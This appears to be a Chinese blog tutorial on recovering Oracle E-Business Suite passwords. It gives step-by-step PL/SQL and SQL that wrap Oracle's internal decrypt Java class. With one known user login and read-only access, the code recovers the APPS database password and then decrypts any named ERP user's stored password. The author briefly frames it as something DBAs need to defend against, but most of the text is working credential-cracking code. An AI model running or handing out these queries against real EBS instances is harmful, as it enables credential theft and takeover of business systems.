破解EBS账户的密码

破解Oracle EBS密码的方法早已不是什么秘密，Google上随便搜索下就会找到很多，本文的只是基于原有的方法略作改动而已。如果你是DBA，就应该思考下如何防范这种破解方法，方法本来就在那，藏着掖着也没必要。

我之前写过一篇Oracle EBS密码安全的文章相关文章：Oracle EBS密码安全的攻与防 ，也许能给你些思路。
获取Oracle EBS的密码，包括两部分：1.怎样获取数据库apps账户的密码，2.怎样获取EBS普通使用账户的密码。

前提

你不可能在一穷二白的情况下搞定所有东西，获取密码，你需要事先知道以下几点:

1.任何一个普通用户名和密码的密码,比如Vision Demo库中的,MFG / WELCOME, GUEST/ORACLE....

2.在目标环境（你要破解的环境，下文简称Target Instance），你可以通过有限的数据库权限(比如APPS_READ_ONLY账户)，获取到第一步中用户对应的FND_USER.ENCRYPTED_FOUNDATION_PASSWORD；

3.一个你可以编译Package的测试/开发的EBS环境(随便的一个EBS环境，不要求一定是上边Target Instance的克隆，Vision Demo也可以)，下文把这个测试/开发环境简称为Dev Instance

1. 破解APPS(Oracle DB)账户的密码

1.1 编译Package

在Dev Instance编译下边的Package,

CREATE OR REPLACE PACKAGE CrackPwd AUTHID CURRENT_USER AS
  FUNCTION getpwd (orauser IN VARCHAR2, appuserpwd IN VARCHAR2)
    RETURN VARCHAR2;
END CrackPwd;
/

CREATE OR REPLACE PACKAGE BODY CrackPwd AS
    FUNCTION getpwd (orauser IN VARCHAR2, appuserpwd IN VARCHAR2)
     RETURN VARCHAR2 AS
     LANGUAGE JAVA
     NAME 'oracle.apps.fnd.security.WebSessionManagerProc.decrypt(java.lang.String,java.lang.String) return java.lang.String';
END CrackPwd;
/

这个Package是这个破解的核心，用于解析混淆过的密码，其实Oracle要有心，就不应该把这个Java类完全放开。

1.2 获取User的ENCRYPTED_FOUNDATION_PASSWORD

在Target Instance，执行下边SQL来获取，已知用户的混淆后的密码ENCRYPTED_FOUNDATION_PASSWORD

SELECT ENCRYPTED_FOUNDATION_PASSWORD FROM APPS.FND_USER WHERE USER_NAME = 'MFG';

1.3 获取APPS账户密码

在Dev Instance，执行下边的语句

SET SERVEROUTPUT ON
DECLARE
guestUserPwd VARCHAR2(200);
guestUserName VARCHAR2(100);
guestFndPwd VARCHAR2(100);
guestEncFndPwd VARCHAR2(100);
delim NUMBER;

BEGIN
  guestUserPwd :='MFG/WELCOME';--The User Name and Password which you have known
  guestEncFndPwd := 'ZGFA756A85B9DDBB1EAAD34D71DA120EA4C5E3F1E496C264EEFCF916F21B16308C067F7CD039BDE748CA2B4780DDF750DD3B';   --Get it from step 1.2

  guestFndPwd :=CrackPwd.getpwd(guestUserPwd,guestEncFndPwd);

  IF NOT (guestFndPwd IS NULL) THEN
    DBMS_OUTPUT.put_line(guestFndPwd);
  END IF;
END;

注：guestUserPwd 为你已知的用户名和密码，比如MFG/WELCOME,注意必须为大写，并且以斜杠/来风格

guestEncFndPwd是1.2步里获取的ENCRYPTED_FOUNDATION_PASSWORD

2.获取用户(Oracle ERP User)的密码

2.1 编译Package

通过1.1~1.3， 你现在已经获取数据库apps账户的密码，那么如何知道其他ERP用户的密码。首先，使用你刚刚获得的 apps账户密码，连接Target Instance。然后编译1.1那个Package。

(如果你已经有了数据库apps账户的密码了，那么无需执行1.1~1.3，直接执行2.2来获取用户密码就好了)

2.2 获取用户密码

SELECT USR.USER_NAME,
       CRACKPWD.GETPWD ((SELECT (SELECT CRACKPWD.GETPWD (FND_WEB_SEC.GET_GUEST_USERNAME_PWD,
                                                         ENCRYPTED_FOUNDATION_PASSWORD)
                                   FROM DUAL) AS APPS_PASSWORD
                           FROM FND_USER
                          WHERE USER_NAME =
                                   (SELECT SUBSTR (FND_WEB_SEC.GET_GUEST_USERNAME_PWD,
                                                   1,
                                                   INSTR (FND_WEB_SEC.GET_GUEST_USERNAME_PWD, '/') - 1
                                                  )
                                      FROM DUAL)),
                        USR.ENCRYPTED_USER_PASSWORD) PASSWORD
FROM FND_USER USR
WHERE USR.USER_NAME = 'OPERATIONS'; --User Name here